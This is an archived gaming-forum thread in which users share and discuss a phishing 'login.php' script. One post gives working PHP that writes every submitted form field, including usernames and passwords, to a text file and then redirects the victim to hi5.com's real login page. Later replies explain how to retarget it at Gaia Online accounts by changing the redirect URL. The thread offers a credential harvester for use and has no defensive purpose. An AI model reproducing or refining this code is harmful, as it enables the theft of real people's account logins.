A preserved archive of the Logical Gamers community forums, 2009-2025. The original threads and posts, served read-only. Registration, posting and private messages are gone for good.

Login.php

2.1k views · started by TEMPTii ·
#1
Login.php
Can somebody post a code for the one that you use? I need to see, and examine it so I can make it better...
#2
<?php
header ('Location: http://www.hi5.com/friend/login.do ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($ handle, "\r\n");
fclose($handle) ;
exit;
?>
#3
Did you make that?
#4
It's A code I use in FLP Login.php Script, Next time use google.
#5
Google wouldn't help at all. I was just looking at the login.php from that basic guide and it seemed... simple.
#6
In google search login.php for phisher. Simple
#7
How about the pkg-gaia-core.js thing (or whatever its called).
The guide doesn't seem to have one
#8
You don't even need pkg-gaia-core.js
#9
Really? Lemme check...
#10
All you need from that is to change the other url from the source code of gaiaonline so it wont redirect. and you can use any FLP login.php you dont need certain Flp php files
#11
I know. I found out that redirect thing just now >>;

And I know you dont need a specific login.php, I just want to modify it to make it better.

And yes, I need that .js file because without it it wont post the username/password (or at least for the way im trying to post it)

E: Wait, no, you're right. My bad...